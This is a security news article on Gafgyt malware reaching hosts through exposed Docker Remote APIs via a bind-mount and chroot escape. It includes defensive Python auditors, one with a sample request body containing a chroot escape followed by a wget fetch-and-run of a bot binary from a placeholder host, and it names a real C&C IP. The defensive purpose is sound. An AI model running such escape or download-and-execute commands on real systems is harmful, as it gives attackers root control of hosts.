Hackers Hijack Docker APIs to Spread Gafgyt Malware

Threat actors are exploiting misconfigured Docker Remote API servers to deploy the Gafgyt malware, potentially enabling them to launch DDoS attacks from the compromised hosts.

Gafgyt, which originally targeted IoT devices, has expanded its scope to Docker Remote API servers, showing how readily the family adapts to new targets and to broader, more capable attacks.

In the first attempt observed, the attacker tried to launch a Gafgyt bot by deploying a Rust-based binary named "rbot" inside a Docker container created from the Alpine Linux image.

Attack chain

The container was created from the Alpine image with the host's filesystem bind-mounted into it; the attacker then used chroot to change into that mount, gaining root access to the host and the ability to carry out further malicious activity outside the container.

From inside that container, the attacker downloads and executes the Gafgyt botnet binary "rbot", which contains hardcoded C&C server details, giving the operator remote control of the infected system.
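The container-creation request is the one point in this chain a defender can inspect before anything runs. The following Python is an added example (not code from the article or from Trend Micro) that audits a Docker `POST /containers/create` body for the pattern described above: a host path such as `/` bind-mounted into the container, privileged mode, or `chroot` in the container command. The sample request body, the `example.invalid` URL and the list of sensitive host paths other than `/` are constructed for illustration and are not indicators from the article.

```python
from __future__ import annotations

import re
from typing import Iterator

# Host paths that should never be bind-mounted into an untrusted container.
# "/" is the case described in the article; the others are an assumption
# added for illustration (each gives equivalent control of the host).
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/var/run/docker.sock"}

# Matches "chroot" used as a command word inside a shell string.
CHROOT_RE = re.compile(r"(?:^|[\s;&|(])(?:/usr/sbin/|/sbin/)?chroot\b")


def _bind_sources(host_config: dict) -> Iterator[str]:
    """Yield host-side source paths from both mount syntaxes the API accepts."""
    for spec in host_config.get("Binds") or []:        # "host:container[:opts]"
        yield spec.split(":", 1)[0]
    for mount in host_config.get("Mounts") or []:      # {"Type": "bind", "Source": ...}
        if mount.get("Type") == "bind" and mount.get("Source"):
            yield mount["Source"]


def _command_text(body: dict) -> str:
    """Flatten Entrypoint and Cmd (string or list) into one searchable string."""
    parts = []
    for key in ("Entrypoint", "Cmd"):
        value = body.get(key)
        if isinstance(value, str):
            parts.append(value)
        elif value:
            parts.extend(str(v) for v in value)
    return " ".join(parts)


def audit_create_request(body: dict) -> list[str]:
    """Return findings for a POST /containers/create body that looks like a host escape."""
    findings = []
    host_config = body.get("HostConfig") or {}

    for src in _bind_sources(host_config):
        normalized = src if src == "/" else src.rstrip("/")
        if normalized in SENSITIVE_HOST_PATHS:
            findings.append(f"host path {src!r} bind-mounted into the container")

    if host_config.get("Privileged"):
        findings.append("container requested Privileged mode")

    if CHROOT_RE.search(_command_text(body)):
        findings.append("chroot in container command (escape via bind-mounted host root)")

    return findings


# Constructed request body modelled on the article's description: Alpine image,
# host root bind-mounted, chroot into it, then fetch and run the bot. The URL
# and paths are placeholders, not indicators from the article.
SAMPLE_ESCAPE = {
    "Image": "alpine",
    "Cmd": ["sh", "-c",
            "chroot /mnt sh -c 'wget http://example.invalid/rbot -O /tmp/rbot "
            "&& chmod +x /tmp/rbot && /tmp/rbot'"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
}

# Constructed benign request for comparison: a read-only data volume, no chroot.
SAMPLE_BENIGN = {
    "Image": "alpine",
    "Cmd": ["sleep", "3600"],
    "HostConfig": {"Binds": ["/srv/app/data:/data:ro"]},
}

if __name__ == "__main__":
    for name, body in (("escape", SAMPLE_ESCAPE), ("benign", SAMPLE_BENIGN)):
        print(name, audit_create_request(body) or "no findings")
```

Note that the escape in the article does not need privileged mode at all: a plain bind mount of `/` plus `chroot` is enough, which is why the check looks at mount sources and the command rather than only at the `Privileged` flag. The same logic can be run over the daemon's request log or wired into an authorization plugin that sees the create body before the container exists.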

Once the bot establishes communication with the C&C server, it processes the received instructions and initiates a multi-vector DDoS attack using UDP, TCP, and HTTP.

HTTP connection creation code

A second container deployment was also attempted from an Alpine Docker image, this time using the "atlas.i586" Gafgyt binary to carry out malicious activity in the target environment.

The attacker again escalated to the host, most likely through the same chroot and bind-mount technique rather than any software vulnerability, and then launched a botnet binary named "atlas.i586" with a "0day" argument. The argument appears to serve configuration or identification purposes; no actual zero-day exploit was identified.

The binary is controlled by a C&C server and executes DDoS attacks using various methods (UDP, ICMP, HTTP, SYN flood, etc.) based on the commands it receives. The "Name:0day" argument is a label passed to the binary and does not by itself indicate that a zero-day vulnerability was exploited.

C&C address

The malware identifies the victim's local IP address by opening a socket toward Google's DNS server: connecting the socket forces the kernel to select an outbound interface, and the malware then reads that interface's address with the `getsockname()` function.
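The trick is a standard one and is easy to reproduce, which also makes it easy to reason about what a defender can and cannot see. The Python below is an added example written for this article, not the malware's code; it assumes Google Public DNS at 8.8.8.8:53 as the probe target, which is an assumption about the sample. It also handles the failure mode the bot would hit on a host with no route to the internet.

```python
import socket


def discover_local_ip(probe_host: str = "8.8.8.8", probe_port: int = 53,
                      fallback: str = "127.0.0.1") -> str:
    """Return the IPv4 address of the interface the kernel would use to reach probe_host.

    connect() on a UDP socket sends nothing on the wire; it only binds the socket
    to the route chosen for the destination, so getsockname() then reveals the
    local address of that interface. 8.8.8.8:53 (Google Public DNS) is an
    assumption standing in for the article's "Google's DNS server".
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.connect((probe_host, probe_port))
        return sock.getsockname()[0]
    except OSError:
        # No route or no name resolution (offline host, sandbox): the trick
        # fails and the caller gets the fallback address instead.
        return fallback
    finally:
        sock.close()


def is_ipv4(text: str) -> bool:
    """True if text is a dotted-quad IPv4 literal."""
    try:
        socket.inet_aton(text)
    except OSError:
        return False
    return text.count(".") == 3


if __name__ == "__main__":
    print("local address:", discover_local_ip())
```

Because a UDP `connect()` alone emits no packet, this discovery step leaves nothing in DNS logs or network captures unless the malware actually sends a query afterwards. A `connect()` to 8.8.8.8:53 from a container process is therefore better caught at the syscall or socket level (auditd, eBPF-based runtime security) than on the wire.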

According to Trend Micro, after an initial container deployment failed, the attacker attempted to deploy a Gafgyt variant by executing a shell script that downloads and runs binaries built for various system architectures.

Local IP address discovery

The "cve.sh" script downloads botnet binaries for different architectures from the C&C server (178.215.238.31) and executes them on the compromised host. Despite its name, whether the script exploits any vulnerability is not established.

To safeguard Docker Remote API servers, restrict who can reach the API, require authentication (for example TLS client certificates), and monitor for anomalies, promptly addressing any suspicious activity.

Apply rigorous container security practices: avoid privileged mode, review container images and configurations before deployment, and train the personnel who manage Docker Remote API servers on the attack vectors described here.
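What "misconfigured" means in practice is a daemon that listens on TCP without TLS client verification, so that anyone who can reach the port controls the host. The Python below is an added example, not from the article or from Docker, that checks a `daemon.json` for exactly that, with a constructed weak configuration beside a hardened one. The certificate paths under `/etc/docker/` are placeholders.

```python
import json

# Constructed daemon.json fragments for illustration (not from the article).
# Weak: the Remote API is reachable over plain TCP with no authentication.
WEAK_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}"""

# Hardened: TLS with client-certificate verification; cert paths are placeholders.
HARDENED_DAEMON_JSON = """{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}"""


def audit_daemon_config(text: str) -> list:
    """Return findings for a daemon.json that exposes the Remote API over TCP."""
    cfg = json.loads(text)
    findings = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        # Unix socket only: reachable just by local users allowed to open it.
        return findings

    if cfg.get("tlsverify"):
        return findings  # clients must present a certificate signed by tlscacert

    if cfg.get("tls"):
        # "tls" alone encrypts the connection but does not authenticate the client.
        findings.append("tls without tlsverify: traffic is encrypted but any client is accepted")
    else:
        findings.append(
            f"Remote API on {', '.join(tcp_hosts)} with no authentication: "
            "anyone who can reach the port controls the host"
        )
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(text) or "no findings")
```

The check keys off the TLS settings rather than the port number, since 2375 and 2376 are only conventions. On systemd-managed installations where the unit already passes `-H fd://`, setting `hosts` in `daemon.json` conflicts with that flag and the daemon will refuse to start; put the listener in a systemd drop-in instead. Even with `tlsverify`, the API should still sit behind a firewall or VPN, because a valid client certificate is root on the host.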

Kaaviya (https://cyberpress.org/)
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She covers cyber security incidents happening in cyberspace.